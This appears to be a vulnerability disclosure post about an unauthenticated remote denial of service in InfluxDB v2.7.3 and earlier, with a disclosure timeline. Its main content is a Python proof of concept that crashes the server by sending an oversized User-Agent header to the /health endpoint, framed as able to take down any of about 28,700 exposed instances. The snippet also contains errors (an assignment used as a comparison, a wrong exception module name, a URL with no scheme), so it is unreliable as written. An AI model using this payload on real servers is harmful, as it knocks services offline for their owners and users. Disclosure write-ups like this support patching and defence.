InfluxDB - Unauthenticated Remote DoS (CVE-XXXX-XXXX)
Description
InfluxDB
is described as a "Scalable datastore for metrics, events, and real-time analytics". I Was looking through InfluxDB
and discovered an unauthenticated remote DoS that effects v2.7.3
and before. Here is the sample code to DoS any InfluxDB
server, Shodan clocks in about ~28700 instances right now.
Proof of Concept
import requests
import time
URL = "localhost"
PORT = "8086"
response = requests.get(
URL + ":"+ PORT + "/health",
headers = {"User-Agent":"A"* 1052334}
)
time.sleep(15)
try:
response2 = requests.get(
URL + ":"+ PORT + "/health",
)
if response2.status_code=200:
print ("Didn't go down, probably a docker container.")
except requests.exception.RequestException as e:
print ("Looks like it was successful")
exit()
Diving deeper into this, the only condition that this exploit relies on is the metrics Scraper must be working properly. The way InfluxDB
parses the HTTP request causing it to crash with a panic due to the size in the scraper.
Location
Disclosure
Nov 7. 2023 - Maintainers contacted
Nov 8. 2023 - Remediation pushed to v2.7.4
Nov 9. 2023 - Maintainers ACK'd security issue